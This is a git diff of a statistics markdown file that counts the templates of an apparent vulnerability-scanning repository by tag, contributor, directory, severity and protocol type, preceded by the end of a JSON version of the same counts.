(digisec360)","count":1},{"name":"divya_mudgal","count":1},{"name":"alperenkesk","count":1},{"name":"hanlaomo","count":1},{"name":"makyotox","count":1},{"name":"kabirsuda","count":1},{"name":"furkansenan","count":1},{"name":"geraldino2","count":1},{"name":"mah3sec_","count":1},{"name":"yavolo","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"gboddin","count":1},{"name":"fopina","count":1},{"name":"streetofhackerr007","count":1},{"name":"arcc","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"un-fmunozs","count":1},{"name":"0xteles","count":1},{"name":"soyelmago","count":1},{"name":"omarkurt","count":1},{"name":"0xrod","count":1},{"name":"naglinagli","count":1},{"name":"r3naissance","count":1},{"name":"b4uh0lz","count":1},{"name":"s1r1u5_","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"wabafet","count":1},{"name":"52971","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"rtcms","count":1},{"name":"qlkwej","count":1},{"name":"yashgoti","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"defr0ggy","count":1},{"name":"c3l3si4n","count":1},{"name":"chron0x","count":1},{"name":"pudsec","count":1},{"name":"_c0wb0y_","count":1},{"name":"ldionmarcil","count":1},{"name":"patralos","count":1},{"name":"exploitation","count":1},{"name":"elder tao","count":1},{"name":"taielab","count":1},{"name":"fmunozs","count":1},{"name":"rodnt","count":1},{"name":"sshell","count":1},{"name":"philippdelteil","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"gal nagli","count":1},{"name":"kareemse1im","count":1},{"name":"schniggie","count":1},{"name":"remonsec","count":1},{"name":"undefl0w","count":1},{"name":"raesene","count":1},{"name":"becivells","count":1},{"name":"0ut0fb4nd","count":1},{"name":"shelld3v","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"akash.c","count":1},{"name":"deena","count":1},{"name":"@dwisiswant0","count":1},{"name":"retr0","count":1},{"name":"zandros0","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"blckraven","count":1},{"name":"zhenwarx","count":1},{"name":"luci","count":1}],"directory":[{"name":"cves","count":534},{"name":"vulnerabilities","count":249},{"name":"exposed-panels","count":212},{"name":"exposures","count":170},{"name":"technologies","count":150},{"name":"misconfiguration","count":118},{"name":"takeovers","count":70},{"name":"default-logins","count":49},{"name":"file","count":43},{"name":"workflows","count":34},{"name":"network","count":27},{"name":"miscellaneous","count":27},{"name":"iot","count":23},{"name":"dns","count":10},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":558},{"name":"high","count":434},{"name":"medium","count":361},{"name":"critical","count":204},{"name":"low","count":149}],"types":[{"name":"http","count":1613},{"name":"file","count":43},{"name":"network","count":35},{"name":"dns","count":10}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index f99c983619..de3a4b0e6c 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,643 +1,669 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |--------------------|-------|--------------------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| -| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 | -| panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 | -| xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 | -| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 | -| exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | | -| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | | -| cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | | -| lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | | -| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | | -| config | 90 | gaurang | 42 | workflows | 34 | | | | | -| cve2021 | 83 | pussycat0x | 34 | miscellaneous | 27 | | | | | -| cve2019 | 82 | ice3man | 26 | network | 27 | | | | | -| tech | 78 | organiccrap | 24 | iot | 22 | | | | | +| cve | 527 | dhiyaneshdk | 227 | cves | 534 | info | 558 | http | 1613 | +| panel | 210 | pikpikcu | 219 | vulnerabilities | 249 | high | 434 | file | 43 | +| xss | 192 | pdteam | 188 | exposed-panels | 212 | medium | 361 | network | 35 | +| wordpress | 182 | dwisiswant0 | 126 | exposures | 170 | critical | 204 | dns | 10 | +| exposure | 178 | geeknik | 120 | technologies | 150 | low | 149 | | | +| rce | 175 | daffainfo | 104 | misconfiguration | 118 | | | | | +| cve2020 | 151 | madrobot | 60 | takeovers | 70 | | | | | +| lfi | 150 | princechaddha | 53 | default-logins | 49 | | | | | +| wp-plugin | 121 | gy741 | 48 | file | 43 | | | | | +| tech | 92 | gaurang | 42 | workflows | 34 | | | | | +| config | 90 | pussycat0x | 36 | network | 27 | | | | | +| cve2019 | 83 | ice3man | 26 | miscellaneous | 27 | | | | | +| cve2021 | 83 | organiccrap | 24 | iot | 23 | | | | | | takeover | 72 | 0x_akoko | 20 | fuzzing | 10 | | | | | | cve2018 | 66 | sheikhrishad | 15 | dns | 10 | | | | | -| | 66 | milo2012 | 14 | cnvd | 9 | | | | | -| token | 63 | philippedelteil | 14 | headless | 5 | | | | | -| apache | 61 | pr3r00t | 13 | .pre-commit-config.yaml | 1 | | | | | -| default-login | 50 | techbrunchfr | 13 | | | | | | | -| iot | 43 | suman_kar | 12 | | | | | | | -| cve2017 | 43 | cyllective | 11 | | | | | | | -| file | 42 | random_robbie | 10 | | | | | | | -| unauth | 40 | righettod | 9 | | | | | | | -| network | 35 | wdahlenb | 9 | | | | | | | -| sqli | 34 | hackergautam | 8 | | | | | | | +| | 66 | philippedelteil | 15 | cnvd | 9 | | | | | +| token | 64 | milo2012 | 14 | headless | 5 | | | | | +| apache | 61 | techbrunchfr | 13 | .pre-commit-config.yaml | 1 | | | | | +| default-login | 50 | pr3r00t | 13 | | | | | | | +| cve2017 | 45 | suman_kar | 12 | | | | | | | +| iot | 44 | cyllective | 11 | | | | | | | +| file | 43 | random_robbie | 10 | | | | | | | +| unauth | 42 | wdahlenb | 9 | | | | | | | +| network | 35 | righettod | 9 | | | | | | | +| sqli | 34 | aashiq | 8 | | | | | | | | oob | 32 | nadino | 8 | | | | | | | -| logs | 29 | aashiq | 8 | | | | | | | -| oracle | 29 | iamthefrogy | 8 | | | | | | | -| workflow | 29 | melbadry9 | 8 | | | | | | | -| ssrf | 27 | that_juan_ | 8 | | | | | | | -| misc | 27 | randomstr1ng | 7 | | | | | | | -| jira | 26 | dr_set | 7 | | | | | | | -| atlassian | 26 | emadshanab | 7 | | | | | | | -| disclosure | 25 | 0x240x23elu | 7 | | | | | | | -| cve2016 | 23 | oppsec | 7 | | | | | | | -| listing | 22 | harshbothra_ | 7 | | | | | | | -| redirect | 20 | techryptic (@tech) | 7 | | | | | | | -| aem | 19 | kophjager007 | 7 | | | | | | | -| cisco | 17 | r3dg33k | 7 | | | | | | | -| sap | 16 | puzzlepeaches | 6 | | | | | | | -| debug | 14 | caspergn | 6 | | | | | | | -| misconfig | 13 | __fazal | 6 | | | | | | | -| struts | 13 | yanyun | 5 | | | | | | | -| fuzz | 13 | joanbono | 5 | | | | | | | -| cve2015 | 13 | panch0r3d | 5 | | | | | | | -| adobe | 12 | ganofins | 5 | | | | | | | -| auth-bypass | 12 | pentest_swissky | 5 | | | | | | | -| weblogic | 12 | meme-lord | 4 | | | | | | | -| android | 12 | iamnoooob | 4 | | | | | | | -| dns | 11 | xelkomy | 4 | | | | | | | -| cve2012 | 11 | nodauf | 4 | | | | | | | -| zoho | 11 | elsfa7110 | 4 | | | | | | | -| springboot | 11 | github.com/its0x08 | 4 | | | | | | | -| cve2011 | 11 | rootxharsh | 4 | | | | | | | -| cve2014 | 10 | e_schultze_ | 4 | | | | | | | -| devops | 10 | impramodsargar | 3 | | | | | | | -| jenkins | 10 | z3bd | 3 | | | | | | | -| cve2013 | 10 | mavericknerd | 3 | | | | | | | -| php | 10 | binaryfigments | 3 | | | | | | | -| dlink | 10 | tess | 3 | | | | | | | -| magento | 9 | dudez | 3 | | | | | | | -| gitlab | 8 | shine | 3 | | | | | | | -| ftp | 8 | yash anand @yashanand155 | 3 | | | | | | | -| rails | 8 | fyoorer | 3 | | | | | | | -| aws | 8 | f1tz | 3 | | | | | | | -| airflow | 8 | thomas_from_offensity | 3 | | | | | | | -| cnvd | 8 | _generic_human_ | 3 | | | | | | | -| router | 8 | jarijaas | 3 | | | | | | | -| joomla | 7 | 0w4ys | 3 | | | | | | | -| nginx | 7 | ree4pwn | 2 | | | | | | | -| scada | 7 | joeldeleep | 2 | | | | | | | -| xxe | 7 | 0xsapra | 2 | | | | | | | -| vmware | 7 | incogbyte | 2 | | | | | | | -| coldfusion | 6 | x1m_martijn | 2 | | | | | | | -| jetty | 6 | vavkamil | 2 | | | | | | | -| rconfig | 6 | dheerajmadhukar | 2 | | | | | | | -| google | 6 | amsda | 2 | | | | | | | -| backup | 6 | fabaff | 2 | | | | | | | -| citrix | 6 | 0xrudra | 2 | | | | | | | -| api | 6 | 0xcrypto | 2 | | | | | | | -| cms | 6 | hetroublemakr | 2 | | | | | | | -| lucee | 5 | koti2 | 2 | | | | | | | -| java | 5 | 0xelkomy | 2 | | | | | | | -| dedecms | 5 | davidmckennirey | 2 | | | | | | | -| ruijie | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| drupal | 5 | bp0lr | 2 | | | | | | | -| django | 5 | udit_thakkur | 2 | | | | | | | -| dell | 5 | nkxxkn | 2 | | | | | | | -| circarlife | 5 | bing0o | 2 | | | | | | | -| ibm | 5 | bsysop | 2 | | | | | | | -| ssti | 5 | ehsahil | 2 | | | | | | | -| confluence | 5 | gevakun | 2 | | | | | | | -| cve2009 | 5 | lotusdll | 2 | | | | | | | -| netgear | 5 | lu4nx | 2 | | | | | | | -| login | 5 | random-robbie | 2 | | | | | | | -| headless | 5 | randomrobbie | 2 | | | | | | | -| laravel | 5 | manas_harsh | 2 | | | | | | | -| solr | 5 | moritz nentwig | 2 | | | | | | | -| iis | 5 | unstabl3 | 2 | | | | | | | -| phpmyadmin | 5 | afaq | 2 | | | | | | | -| files | 5 | pxmme1337 | 2 | | | | | | | -| thinkphp | 4 | 0xprial | 2 | | | | | | | -| hongdian | 4 | emenalf | 2 | | | | | | | -| solarwinds | 4 | zomsop82 | 2 | | | | | | | -| magmi | 4 | shifacyclewala | 2 | | | | | | | -| tomcat | 4 | w4cky_ | 2 | | | | | | | -| samsung | 4 | foulenzer | 2 | | | | | | | -| jolokia | 4 | swissky | 2 | | | | | | | -| webserver | 4 | kiblyn11 | 2 | | | | | | | -| elastic | 4 | thevillagehacker | 1 | | | | | | | -| traversal | 4 | bernardo rodrigues | 1 | | | | | | | +| workflow | 29 | iamthefrogy | 8 | | | | | | | +| oracle | 29 | that_juan_ | 8 | | | | | | | +| logs | 29 | hackergautam | 8 | | | | | | | +| misc | 27 | melbadry9 | 8 | | | | | | | +| ssrf | 27 | randomstr1ng | 7 | | | | | | | +| jira | 26 | 0x240x23elu | 7 | | | | | | | +| atlassian | 26 | oppsec | 7 | | | | | | | +| disclosure | 25 | techryptic (@tech) | 7 | | | | | | | +| cve2016 | 24 | harshbothra_ | 7 | | | | | | | +| listing | 23 | emadshanab | 7 | | | | | | | +| redirect | 21 | kophjager007 | 7 | | | | | | | +| aem | 19 | r3dg33k | 7 | | | | | | | +| cisco | 18 | dr_set | 7 | | | | | | | +| sap | 16 | caspergn | 6 | | | | | | | +| cve2015 | 16 | puzzlepeaches | 6 | | | | | | | +| debug | 14 | __fazal | 6 | | | | | | | +| misconfig | 13 | yanyun | 5 | | | | | | | +| struts | 13 | pentest_swissky | 5 | | | | | | | +| android | 13 | joanbono | 5 | | | | | | | +| fuzz | 13 | ganofins | 5 | | | | | | | +| adobe | 12 | panch0r3d | 5 | | | | | | | +| weblogic | 12 | nodauf | 4 | | | | | | | +| cve2012 | 12 | github.com/its0x08 | 4 | | | | | | | +| auth-bypass | 12 | xelkomy | 4 | | | | | | | +| zoho | 11 | meme-lord | 4 | | | | | | | +| cve2011 | 11 | e_schultze_ | 4 | | | | | | | +| dns | 11 | rootxharsh | 4 | | | | | | | +| springboot | 11 | elsfa7110 | 4 | | | | | | | +| jenkins | 11 | iamnoooob | 4 | | | | | | | +| dlink | 10 | jarijaas | 3 | | | | | | | +| cve2014 | 10 | dudez | 3 | | | | | | | +| cve2013 | 10 | thomas_from_offensity | 3 | | | | | | | +| devops | 10 | mavericknerd | 3 | | | | | | | +| php | 10 | impramodsargar | 3 | | | | | | | +| router | 9 | f1tz | 3 | | | | | | | +| magento | 9 | tess | 3 | | | | | | | +| airflow | 8 | yash anand @yashanand155 | 3 | | | | | | | +| aws | 8 | shine | 3 | | | | | | | +| ftp | 8 | _generic_human_ | 3 | | | | | | | +| cnvd | 8 | z3bd | 3 | | | | | | | +| gitlab | 8 | fyoorer | 3 | | | | | | | +| rails | 8 | 0w4ys | 3 | | | | | | | +| nginx | 7 | binaryfigments | 3 | | | | | | | +| xxe | 7 | fabaff | 2 | | | | | | | +| scada | 7 | 0xsapra | 2 | | | | | | | +| vmware | 7 | nkxxkn | 2 | | | | | | | +| cve2009 | 7 | hahwul | 2 | | | | | | | +| joomla | 7 | ehsahil | 2 | | | | | | | +| dell | 6 | zomsop82 | 2 | | | | | | | +| jetty | 6 | emenalf | 2 | | | | | | | +| coldfusion | 6 | foulenzer | 2 | | | | | | | +| backup | 6 | davidmckennirey | 2 | | | | | | | +| rconfig | 6 | manas_harsh | 2 | | | | | | | +| google | 6 | afaq | 2 | | | | | | | +| citrix | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| cms | 6 | 0xrudra | 2 | | | | | | | +| api | 6 | incogbyte | 2 | | | | | | | +| lucee | 5 | pxmme1337 | 2 | | | | | | | +| drupal | 5 | bing0o | 2 | | | | | | | +| circarlife | 5 | 0xcrypto | 2 | | | | | | | +| ibm | 5 | alifathi-h1 | 2 | | | | | | | +| dedecms | 5 | hetroublemakr | 2 | | | | | | | +| django | 5 | w4cky_ | 2 | | | | | | | +| netgear | 5 | vavkamil | 2 | | | | | | | +| fileupload | 5 | lotusdll | 2 | | | | | | | +| laravel | 5 | x1m_martijn | 2 | | | | | | | +| files | 5 | shifacyclewala | 2 | | | | | | | +| phpmyadmin | 5 | unstabl3 | 2 | | | | | | | +| headless | 5 | amsda | 2 | | | | | | | +| ssti | 5 | random-robbie | 2 | | | | | | | +| solr | 5 | joeldeleep | 2 | | | | | | | +| confluence | 5 | bsysop | 2 | | | | | | | +| ruijie | 5 | bp0lr | 2 | | | | | | | +| login | 5 | swissky | 2 | | | | | | | +| iis | 5 | udit_thakkur | 2 | | | | | | | +| java | 5 | 0xprial | 2 | | | | | | | +| tomcat | 4 | gevakun | 2 | | | | | | | +| asp | 4 | moritz nentwig | 2 | | | | | | | +| webserver | 4 | koti2 | 2 | | | | | | | +| vpn | 4 | ree4pwn | 2 | | | | | | | +| artifactory | 4 | kiblyn11 | 2 | | | | | | | +| elastic | 4 | randomrobbie | 2 | | | | | | | +| traversal | 4 | dheerajmadhukar | 2 | | | | | | | +| crlf | 4 | lu4nx | 2 | | | | | | | +| docker | 4 | 0xelkomy | 2 | | | | | | | +| moodle | 4 | zhenwarx | 1 | | | | | | | +| solarwinds | 4 | 52971 | 1 | | | | | | | +| nodejs | 4 | arcc | 1 | | | | | | | +| thinkcmf | 4 | ldionmarcil | 1 | | | | | | | +| hongdian | 4 | kabirsuda | 1 | | | | | | | +| samsung | 4 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| deserialization | 4 | gal nagli | 1 | | | | | | | +| magmi | 4 | andirrahmani1 | 1 | | | | | | | +| thinkphp | 4 | aceseven (digisec360) | 1 | | | | | | | +| jolokia | 4 | soyelmago | 1 | | | | | | | +| terramaster | 3 | knassar702 | 1 | | | | | | | +| amazon | 3 | yashgoti | 1 | | | | | | | +| bitrix | 3 | johnjhacking | 1 | | | | | | | +| itop | 3 | exploitation | 1 | | | | | | | +| kubernetes | 3 | berkdusunur | 1 | | | | | | | +| lfr | 3 | bjhulst | 1 | | | | | | | +| fpd | 3 | micha3lb3n | 1 | | | | | | | +| vbulletin | 3 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| vpn | 4 | sshell | 1 | | | | | | | -| artifactory | 4 | gal nagli | 1 | | | | | | | -| fileupload | 4 | mubassirpatel | 1 | | | | | | | -| nodejs | 4 | furkansenan | 1 | | | | | | | -| moodle | 4 | un-fmunozs | 1 | | | | | | | -| crlf | 4 | thezakman | 1 | | | | | | | -| asp | 4 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| docker | 4 | j33n1k4 | 1 | | | | | | | -| thinkcmf | 4 | kareemse1im | 1 | | | | | | | -| grafana | 3 | divya_mudgal | 1 | | | | | | | -| springcloud | 3 | 0xrod | 1 | | | | | | | -| slack | 3 | naglinagli | 1 | | | | | | | -| microstrategy | 3 | @dwisiswant0 | 1 | | | | | | | -| nacos | 3 | _darrenmartyn | 1 | | | | | | | -| ofbiz | 3 | johnjhacking | 1 | | | | | | | -| windows | 3 | bad5ect0r | 1 | | | | | | | -| nosqli | 3 | regala_ | 1 | | | | | | | -| backups | 3 | geraldino2 | 1 | | | | | | | -| fpd | 3 | smaranchand | 1 | | | | | | | -| kubernetes | 3 | wabafet | 1 | | | | | | | -| hp | 3 | gboddin | 1 | | | | | | | -| ebs | 3 | makyotox | 1 | | | | | | | -| targa | 3 | chron0x | 1 | | | | | | | -| ssh | 3 | g4l1t0 and @convisoappsec | 1 | | | | | | | -| vbulletin | 3 | akash.c | 1 | | | | | | | -| oa | 3 | fmunozs | 1 | | | | | | | -| r-seenet | 3 | daviey | 1 | | | | | | | -| amazon | 3 | blckraven | 1 | | | | | | | -| resin | 3 | alex | 1 | | | | | | | -| caucho | 3 | knassar702 | 1 | | | | | | | -| cve2010 | 3 | remonsec | 1 | | | | | | | -| mongodb | 3 | noamrathaus | 1 | | | | | | | -| fanruan | 3 | soyelmago | 1 | | | | | | | -| deserialization | 3 | shreyapohekar | 1 | | | | | | | -| log | 3 | ohlinge | 1 | | | | | | | -| git | 3 | cookiehanhoan | 1 | | | | | | | -| openssh | 3 | retr0 | 1 | | | | | | | -| terramaster | 3 | 0xtavian | 1 | | | | | | | -| bypass | 3 | bolli95 | 1 | | | | | | | -| kafka | 3 | ldionmarcil | 1 | | | | | | | -| lfr | 3 | fopina | 1 | | | | | | | -| printer | 3 | jeya seelan | 1 | | | | | | | -| frp | 2 | nytr0gen | 1 | | | | | | | -| jboss | 2 | rtcms | 1 | | | | | | | -| ucmdb | 2 | elmahdi | 1 | | | | | | | -| webcam | 2 | defr0ggy | 1 | | | | | | | -| plesk | 2 | c3l3si4n | 1 | | | | | | | -| microsoft | 2 | vsh00t | 1 | | | | | | | -| proxy | 2 | exploitation | 1 | | | | | | | -| trixbox | 2 | andysvints | 1 | | | | | | | -| paloalto | 2 | 52971 | 1 | | | | | | | -| xxljob | 2 | mah3sec_ | 1 | | | | | | | -| keycloak | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| smb | 2 | sickwell | 1 | | | | | | | -| linkerd | 2 | dawid czarnecki | 1 | | | | | | | -| natshell | 2 | affix | 1 | | | | | | | -| jellyfin | 2 | yashanand155 | 1 | | | | | | | -| globalprotect | 2 | mhdsamx | 1 | | | | | | | -| httpd | 2 | whynotke | 1 | | | | | | | -| hjtcloud | 2 | bjhulst | 1 | | | | | | | -| sonarqube | 2 | d0rkerdevil | 1 | | | | | | | -| cache | 2 | raesene | 1 | | | | | | | -| showdoc | 2 | undefl0w | 1 | | | | | | | -| vrealize | 2 | sushant kamble | 1 | | | | | | | -| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | -| dos | 2 | ipanda | 1 | | | | | | | -| kibana | 2 | co0nan | 1 | | | | | | | -| mida | 2 | patralos | 1 | | | | | | | -| oauth | 2 | sicksec | 1 | | | | | | | -| fortios | 2 | hakluke | 1 | | | | | | | -| rstudio | 2 | luci | 1 | | | | | | | -| strapi | 2 | ahmed sherif | 1 | | | | | | | -| cve2008 | 2 | streetofhackerr007 | 1 | | | | | | | -| shellshock | 2 | rojanrijal | 1 | | | | | | | -| openfire | 2 | 0ut0fb4nd | 1 | | | | | | | -| intrusive | 2 | alph4byt3 | 1 | | | | | | | -| kentico | 2 | b0yd | 1 | | | | | | | -| emerge | 2 | hanlaomo | 1 | | | | | | | -| kevinlab | 2 | revblock | 1 | | | | | | | -| hpe | 2 | sullo | 1 | | | | | | | -| mail | 2 | andirrahmani1 | 1 | | | | | | | -| ecology | 2 | sy3omda | 1 | | | | | | | -| yapi | 2 | kabirsuda | 1 | | | | | | | -| idrac | 2 | alifathi-h1 | 1 | | | | | | | -| splunk | 2 | idealphase | 1 | | | | | | | -| cve2007 | 2 | kba@sogeti_esec | 1 | | | | | | | -| rockmongo | 2 | deena | 1 | | | | | | | -| openam | 2 | taielab | 1 | | | | | | | -| zhiyuan | 2 | alperenkesk | 1 | | | | | | | -| seeyon | 2 | micha3lb3n | 1 | | | | | | | -| wordfence | 2 | shelld3v | 1 | | | | | | | -| smtp | 2 | becivells | 1 | | | | | | | -| odoo | 2 | s1r1u5_ | 1 | | | | | | | -| service | 2 | toufik airane | 1 | | | | | | | -| waf | 2 | luskabol | 1 | | | | | | | -| nagios | 2 | arcc | 1 | | | | | | | -| rockethchat | 2 | schniggie | 1 | | | | | | | -| zabbix | 2 | th3.d1p4k | 1 | | | | | | | -| chiyu | 2 | 0xteles | 1 | | | | | | | -| couchdb | 2 | _harleo | 1 | | | | | | | -| prometheus | 2 | pdp | 1 | | | | | | | -| injection | 2 | kurohost | 1 | | | | | | | -| telerik | 2 | notsoevilweasel | 1 | | | | | | | -| chamilo | 2 | ringo | 1 | | | | | | | -| nexus | 2 | pudsec | 1 | | | | | | | -| bigip | 2 | omarkurt | 1 | | | | | | | -| huawei | 2 | flag007 | 1 | | | | | | | -| glassfish | 2 | dogasantos | 1 | | | | | | | -| leak | 2 | vzamanillo | 1 | | | | | | | -| voipmonitor | 2 | yavolo | 1 | | | | | | | -| bitrix | 2 | @github.com/defr0ggy | 1 | | | | | | | -| pega | 2 | juicypotato1 | 1 | | | | | | | -| igs | 2 | ilovebinbash | 1 | | | | | | | -| maian | 2 | iampritam | 1 | | | | | | | -| spark | 2 | abison_binoy | 1 | | | | | | | -| hashicorp | 2 | 0h1in9e | 1 | | | | | | | -| saltstack | 2 | apt-mirror | 1 | | | | | | | -| icewarp | 2 | yashgoti | 1 | | | | | | | -| activemq | 2 | willd96 | 1 | | | | | | | -| sonicwall | 2 | absshax | 1 | | | | | | | -| sharepoint | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| slack | 3 | flag007 | 1 | | | | | | | +| bypass | 3 | yavolo | 1 | | | | | | | +| ebs | 3 | its0x08 | 1 | | | | | | | +| grafana | 3 | fmunozs | 1 | | | | | | | +| hp | 3 | sshell | 1 | | | | | | | +| cve2010 | 3 | sy3omda | 1 | | | | | | | +| windows | 3 | affix | 1 | | | | | | | +| kafka | 3 | 0xrod | 1 | | | | | | | +| zabbix | 3 | apt-mirror | 1 | | | | | | | +| ssh | 3 | dogasantos | 1 | | | | | | | +| caucho | 3 | thevillagehacker | 1 | | | | | | | +| microstrategy | 3 | taielab | 1 | | | | | | | +| nosqli | 3 | ahmed sherif | 1 | | | | | | | +| backups | 3 | ilovebinbash | 1 | | | | | | | +| oa | 3 | alex | 1 | | | | | | | +| resin | 3 | kareemse1im | 1 | | | | | | | +| printer | 3 | noamrathaus | 1 | | | | | | | +| targa | 3 | johnk3r | 1 | | | | | | | +| mongodb | 3 | retr0 | 1 | | | | | | | +| fanruan | 3 | bolli95 | 1 | | | | | | | +| springcloud | 3 | d0rkerdevil | 1 | | | | | | | +| r-seenet | 3 | 0h1in9e | 1 | | | | | | | +| openssh | 3 | 0xtavian | 1 | | | | | | | +| nacos | 3 | b4uh0lz | 1 | | | | | | | +| ofbiz | 3 | rodnt | 1 | | | | | | | +| log | 3 | andysvints | 1 | | | | | | | +| git | 3 | sickwell | 1 | | | | | | | +| sonicwall | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| glassfish | 2 | vzamanillo | 1 | | | | | | | +| flir | 2 | blckraven | 1 | | | | | | | +| horde | 2 | jeya seelan | 1 | | | | | | | +| injection | 2 | dawid czarnecki | 1 | | | | | | | +| jsf | 2 | jteles | 1 | | | | | | | +| ecology | 2 | geraldino2 | 1 | | | | | | | +| prometheus | 2 | aresx | 1 | | | | | | | +| microsoft | 2 | bernardofsr | 1 | | | | | | | +| github | 2 | deena | 1 | | | | | | | +| spark | 2 | rtcms | 1 | | | | | | | +| pega | 2 | tirtha_mandal | 1 | | | | | | | +| shellshock | 2 | hanlaomo | 1 | | | | | | | +| maian | 2 | huowuzhao | 1 | | | | | | | +| kibana | 2 | regala_ | 1 | | | | | | | +| huawei | 2 | daviey | 1 | | | | | | | +| openfire | 2 | luskabol | 1 | | | | | | | +| zhiyuan | 2 | @github.com/defr0ggy | 1 | | | | | | | +| cache | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| paloalto | 2 | @dwisiswant0 | 1 | | | | | | | +| ucmdb | 2 | kba@sogeti_esec | 1 | | | | | | | +| idrac | 2 | alperenkesk | 1 | | | | | | | +| igs | 2 | mubassirpatel | 1 | | | | | | | +| webcam | 2 | smaranchand | 1 | | | | | | | +| intrusive | 2 | bad5ect0r | 1 | | | | | | | +| couchdb | 2 | undefl0w | 1 | | | | | | | +| smtp | 2 | divya_mudgal | 1 | | | | | | | +| waf | 2 | c3l3si4n | 1 | | | | | | | +| fortios | 2 | qlkwej | 1 | | | | | | | +| cve2007 | 2 | iampritam | 1 | | | | | | | +| sonarqube | 2 | shelld3v | 1 | | | | | | | +| bigip | 2 | _darrenmartyn | 1 | | | | | | | +| smb | 2 | ohlinge | 1 | | | | | | | +| hjtcloud | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | | | | security | | | | | | | | -| flir | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| nextjs | 2 | tirtha_mandal | 1 | | | | | | | -| redcap | 1 | _c0wb0y_ | 1 | | | | | | | -| mantis | 1 | r3naissance | 1 | | | | | | | -| npm | 1 | aceseven (digisec360) | 1 | | | | | | | -| anchorcms | 1 | j3ssie/geraldino2 | 1 | | | | | | | -| k8s | 1 | bernardofsr | 1 | | | | | | | -| shopxo | 1 | johnk3r | 1 | | | | | | | -| alibaba | 1 | rodnt | 1 | | | | | | | -| axis | 1 | akshansh | 1 | | | | | | | -| jsf | 1 | jteles | 1 | | | | | | | -| servicenow | 1 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| expn | 1 | ratnadip gajbhiye | 1 | | | | | | | -| sco | 1 | its0x08 | 1 | | | | | | | -| h3c-imc | 1 | mohammedsaneem | 1 | | | | | | | -| powercreator | 1 | shifacyclewla | 1 | | | | | | | -| haproxy | 1 | aresx | 1 | | | | | | | -| gateone | 1 | ooooooo_q | 1 | | | | | | | -| plugin | 1 | zandros0 | 1 | | | | | | | -| duomicms | 1 | ajaysenr | 1 | | | | | | | -| addpac | 1 | berkdusunur | 1 | | | | | | | -| blind | 1 | qlkwej | 1 | | | | | | | -| netsweeper | 1 | petruknisme | 1 | | | | | | | -| javamelody | 1 | tim_koopmans | 1 | | | | | | | -| wiki | 1 | manuelbua | 1 | | | | | | | -| faraday | 1 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| ec2 | 1 | zhenwarx | 1 | | | | | | | -| mongoshake | 1 | b4uh0lz | 1 | | | | | | | -| xiuno | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| monitorix | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| mcafee | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| sangfor | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| rfi | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| jnoj | 1 | | | | | | | | | -| pagespeed | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| manageengine | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| solman | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| ssltls | 1 | | | 